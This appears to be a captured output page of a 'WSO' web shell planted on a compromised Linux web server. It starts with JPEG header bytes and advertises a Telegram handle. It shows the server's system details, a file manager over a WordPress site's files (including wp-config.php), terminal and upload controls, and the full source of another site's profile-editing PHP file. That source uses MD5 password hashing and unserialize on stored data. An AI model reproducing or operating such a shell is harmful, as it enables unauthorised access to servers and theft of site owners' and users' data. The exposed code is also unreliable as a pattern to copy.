����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:		Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-09 00:24:27
1999.30 GB Free: 82.89 GB (4%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-09 00:21:02drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-08 17:17:21drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
$ pwd: /home/httpd/html/baretube.com/
Upload Files
File: /home/httpd/html/baretube.com/edit_profile.php
<?
session_start();
include('admin/db.php');
if(!$_SESSION[userid]) {
	header("Location: /login.php");
	exit();
}

if($_POST) {
	$uniq = uniqid();
	$newpassword = mysql_real_escape_string($_POST[newpassword]); 
	$age = mysql_real_escape_string(htmlentities($_POST[age])); 
	$gender = mysql_real_escape_string(htmlentities($_POST[gender])); 
	$description = mysql_real_escape_string(htmlentities($_POST[description])); 
	$location = mysql_real_escape_string(htmlentities($_POST[location]));
	$email = mysql_real_escape_string(htmlentities($_POST[email])); 
	$custom = mysql_real_escape_string(serialize($_POST[custom])); 
	mysql_query("UPDATE users SET email = '$email', location = '$location', age = '$age', gender = '$gender', description = '$description', custom = '$custom' WHERE record_num = '$_SESSION[userid]'");
	$message = "Your information has been updated.";
	
	if($_POST[newpassword]) {
		$newpass = mysql_real_escape_string(md5($_POST[newpassword])); 
		mysql_query("UPDATE users SET password = '$newpass' WHERE record_num = '$_SESSION[userid]'");
	}
	if($_FILES[file][tmp_name]) { 
		if(filesize($_FILES[file][tmp_name]) > 51200) {
			$message = "Your avatar is too big. It can be a maximum of 50kb in GIF,JPG, or PNG format.";
		}
		else {
			$ext = explode(".",strtolower($_FILES[file][name])); 
			$ext = array_reverse($ext); 
			if($ext[0] != 'jpg' && $ext[0] != 'jpeg' && $ext[0] != 'png' && $ext[0] != 'gif') { 
				$message = "You may only upload image files.";
			}
			else {
				$filename = $uniq.'.'.$ext[0]; 
				$target = $misc_path."/".$filename;
				move_uploaded_file($_FILES[file][tmp_name],$target);
				list($width, $height, $type, $attr) = getimagesize($target);
				//if($width > $thumbwidth || $height > $thumbheight) {
				//	$message = "Your image may be a maximum of $thumbwidth"."x".$thumbheight;
				//	@unlink($target); 
				//}
				//else {
					mysql_query("UPDATE users SET avatar = '$filename' WHERE record_num = '$_SESSION[userid]'");	
					$message = "Your information has been updated.";
				//}
			}
		}
	}
}
$result = mysql_query("SELECT * FROM users WHERE record_num = '$_SESSION[userid]'");
$row = mysql_fetch_array($result); 

$custom = unserialize($row[custom]); 
$title = 'Edit Profile';
$headertitle = 'Edit Profile';
if($isMobile) {
	include($basepath.'/templates/mobile.overall_header.php');
}
else {
	include($basepath.'/templates/template.overall_header.php');
}
?>
<? if($message) { echo "<p>$message</p>"; } ?>
<form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
  <table width="560" border="0" align="left">
    <tr>
      <td width="143">Change Password</td>
      <td width="407"><input type="text" name="newpassword" id="textfield" value='' /></td>
    </tr>
    <tr>
      <td width="143">Email Address</td>
      <td width="407"><input type="text" name="email" id="textfield" value='<? echo $row[email]; ?>' /></td>
    </tr>
    <tr>
      <td width="143">Location</td>
      <td width="407"><input type="text" name="location" id="textfield" value='<? echo $row[location]; ?>' /></td>
    </tr>
    <tr>
      <td>Age</td>
      <td><select name="age" id="select" style='width: 50px;'>
   <? for($i = 18; $i < 100; $i++) {
   		if($row[age] == $i) { $selected = 'selected'; } else { $selected = ''; }
		echo "<option $selected value='$i'> $i </option>";  
	  }
	  ?>
      </select>
      </td>
    </tr>
    <tr>
      <td>Gender</td>
      <td><select name="gender" id="select2">
      	<option <? if($row[gender] == 'Male') { echo 'selected'; } ?> value='Male'>Male</option>
        <option <? if($row[gender] == 'Female') { echo 'selected'; } ?> value='Female'>Female</option>
      </select>
      </td>
    </tr>
    
<?
foreach($custom_user_fields as $k=>$v) {
?>
<tr>
      <td><? echo $k; ?></td>
      <td>
      <? if(is_array($v)) { ?>
      <select name="custom[<? echo $k; ?>]">
      		<? foreach($v as $i) { 
				if($custom[$k] == $i) { $selected = 'selected'; } else { $selected = ''; }
			?>
            <option <? echo $selected; ?>><? echo $i; ?></option>
            <? } ?>
      </select>
      <? } else { ?>
      <input type="text" name="custom[<? echo $k; ?>]" id="textfield" value='<? echo htmlentities($custom[$k]); ?>' />
      <? } ?>
      </td>
    </tr>
<? } ?>
    
    
    
    <tr>
      <td valign="top">A Bit About Yourself...</td>
      <td><textarea name="description" id="textarea" cols="45" rows="8"><? echo $row[description]; ?></textarea></td>
    </tr>
    <tr>
      <td>Upload Avatar (<? echo $thumbwidth; ?>x<? echo $thumbheight; ?>, max 50kb)</td>
      <td><input type="file" name="file" id="fileField" /></td>
    </tr>
    <? if($row[avatar] != '') { ?>
    <tr>
      <td>Current Avatar</td>
      <td align='left'><img src='<? echo $misc_url; ?>/<? echo $row[avatar]; ?>' width=<? echo $thumbwidth; ?> height=<? echo $thumbheight; ?> /></td>
    </tr>
    <? } ?>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="Save" /></td>
    </tr>
  </table>
</form>
<br class="clearfloat" />
<? 
if($isMobile) {
	include($basepath.'/templates/mobile.overall_footer.php');
}
else {
	include($basepath.'/templates/template.overall_footer.php');
}
?>
@ Telegram